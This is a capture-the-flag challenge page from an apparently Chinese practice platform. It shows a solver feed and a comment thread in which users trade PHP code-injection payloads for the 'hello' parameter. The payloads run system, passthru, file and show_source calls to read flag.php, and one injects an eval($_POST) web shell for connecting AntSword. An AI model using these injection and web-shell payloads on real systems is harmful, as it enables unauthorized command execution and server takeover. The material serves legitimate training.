评分(13)
解题动态
小白修炼日常 攻破了该题 28分钟前
tafeishi 攻破了该题 1小时前
diandianying 攻破了该题 21小时前
amuliang1 攻破了该题 23小时前
恣睢 攻破了该题 1天前
xiaoqixy1 攻破了该题 1天前
lonely_wolf 攻破了该题 1天前
soymilk 攻破了该题 1天前
gedeer 攻破了该题 2天前
ysjy 攻破了该题 2天前
cholmon 攻破了该题 2天前
ling_x 攻破了该题 2天前
Anos 攻破了该题 3天前
15369226763 攻破了该题 3天前
人生1234 攻破了该题 3天前
asasehotaru 攻破了该题 3天前
wwwwander 攻破了该题 4天前
re_void 攻破了该题 4天前
wefyh 攻破了该题 4天前
评论
默认 1年前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的
wywsssf 1年前
举报
找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功
dlgz 1年前
举报
?hello=file(%27flag.php%27) ?hello=system(%27tac%20f*%27)
wuzhi唔知 1年前
举报
http://IP:PORT/?hello="<input%20value=%27$flag%27>" ---TEST end
Bruce20231767 1年前
举报
http://117.72.52.127:18257/?hello=system(%22tac%20flag.php%22)
lmds 1年前
举报
?hello=passthru('tac flag.php')
TUGUNBB 1年前
举报
?hello=system("base64 flag.php"),拿到的东西base64解码就行了
iNMB 1年前
举报
简单粗暴,直接连蚁剑?hello=);eval($_POST[%27attack%27]);//
一个姓⎝李⎠的师傅~ 1年前
举报
@a6819772 看你 \$_POST['这里用什么接收'] 就填写什么密码
a6819772 1年前
举报
密码填什么 连蚁剑的话
SLfanCTF 1年前
举报
?hello=show_source(next(array_reverse(scandir(current(localeconv())))))
zhuizhui 1年前
举报
hello=);system('tac fl*');//